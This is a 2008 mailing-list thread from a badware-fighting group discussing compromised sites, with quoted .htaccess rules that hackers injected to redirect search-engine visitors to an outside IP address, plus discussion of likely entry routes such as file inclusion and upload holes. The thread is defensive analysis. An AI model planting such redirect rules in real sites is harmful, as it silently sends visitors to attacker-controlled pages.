good points!
On Thu, 2008-11-20 at 14:11 -0800, SteveW wrote:
> All they need to do is get their PHP script to run on your server.
> That will allow them to write or modify files, including .htaccess.
>
> They can do that with a Remote File Inclusion (RFI) attack. Those
> would show in your site logs.
>
> A security hole in Drupal or other software would allow them to upload
> a script (such as for a forum message attachment, avatar, etc.), and
> then run it.
>
> Chances are good it was done by script.
>
> The .htaccess code provided by Anirban does prevent anyone from
> viewing your .htaccess file with their browser, but it won't prevent
> modifying the file with PHP or by FTP. On some server configurations,
> a malicious "neighbor" on your shared server could also conduct a PHP
> attack that would be able to modify your files. If a shared server got
> severely compromised, the attackers could get access to all the sites
> on it. You could check whether other sites on your server are also
> flagged/compromised.
>
> .htaccess must have permissions of 644, same as any other file. If
> it's locked down any tighter than that, Apache itself won't be able to
> read it, which will generate errors.
>
> Reading it isn't really the problem, anyway. They are able to write to
> it, which means there is a security hole somewhere.
>
>
> On Nov 20, 12:05 pm, Jesse Nicola <[EMAIL PROTECTED]> wrote:
> > Yep.
> >
> > What I want to know is how they are getting such widespread access to
> > .htaccess files, and what we can do to prevent this!
> >
> >
> >
> > UseShots wrote:
> > > Thanks Jesse,
> >
> > > Here is the code inserted into .htaccess
> > > -------------
> > > RewriteEngine On
> > > RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
> > > RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
> > > RewriteRule .*http://89.28.13.202/in.html?s=ix[R,L]
> > > -------------
> >
> > > As you can see it only redirects search engine traffic. Site owners
> > > usually unaware about this until someone tells them.
> >
> > > Denis
> > >http://www.UnmaskParasites.com- Hide quoted text -
> >
> > - Show quoted text -
> >
--~--~---------~--~----~------------~-------~--~----~
You received this message through the Google Groups "stopbadware" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[EMAIL PROTECTED]
For more options, visit this group at
http://groups.google.com/group/stopbadware?hl=en
-~----------~----~----~----~------~----~------~--~---
